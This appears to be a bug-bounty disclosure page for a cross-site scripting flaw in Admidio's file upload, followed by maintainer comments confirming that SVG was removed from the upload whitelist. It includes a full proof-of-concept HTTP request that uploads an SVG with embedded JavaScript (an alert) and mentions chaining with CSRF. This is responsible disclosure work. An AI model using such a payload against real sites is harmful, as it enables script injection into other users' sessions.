Cross-site Scripting (XSS) - Reflected in admidio/admidio

Valid

Reported on

Oct 17th 2021


Description

Am still able to reproduce the SVG-XSS vulnerability here https://huntr.dev/bounties/96221dff-0d40-4326-9a9e-f66608307980/ on my local system (just downloaded the latest release on the website. Think you may have accidentally included SVG files into the whitelist.

Proof of Concept

POST /admidio/adm_program/system/file_upload.php?module=documents_files&mode=upload_files&id=6 HTTP/1.1
Host: 10.0.2.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------105596666835784551932184244642
Content-Length: 571
Origin: http://10.0.2.15
Connection: close
Referer: http://10.0.2.15/admidio/adm_program/system/file_upload.php?module=documents_files&id=6
Cookie: ADMIDIO_INSTALLATION_SESSION_ID=ajhu2uaaoaha7fk8vpdv165kao; ADMIDIO_abc_db_adm_SESSION_ID=r1pltsf7bp9fodrffonheefdnd; 'ADMIDIO_abc_db_adm_cookieconsent_status=dismiss; OJSSID=4bbfi99a73d9r0f5jm94irg6ls; PHPSESSID=3l4k4gsg30qn5ed2al4un9l5j7


-----------------------------105596666835784551932184244642
Content-Disposition: form-data; name="files[]"; filename="payload.svg"
Content-Type: image/svg+xml
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
-----------------------------105596666835784551932184244642--

Impact

This vulnerability is capable of reflected XSS via upload of malicious SVG files

Note: Can be chained with CSRF to perform XSS without the need of upload privileges.

We have contacted a member of the admidio team and are waiting to hear back 2 months ago
We have contacted a member of the admidio team and are waiting to hear back 2 months ago
haxatron submitted a
2 months ago
haxatron
2 months ago

Researcher


Patch fix here: https://github.com/Admidio/admidio/commit/b8fa68c830cc1c347f8b5d19cbd33c79ea747ddc
Fix should treat SVG as attachments instead of inline files, preventing XSS issue...

haxatron
2 months ago

Researcher


My apologies, please ignore the patchfix as I dont think its complete

haxatron
2 months ago

Researcher


dont think its correct*

Markus Faßbender validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus
2 months ago

I add the whitelist after I fix the original post from you and than don't check the whitelist against svg :-( Now I removed SVG from the whitelist.

Markus Faßbender confirmed that a fix has been merged on 4f1539 2 months ago
Markus Faßbender has been awarded the fix bounty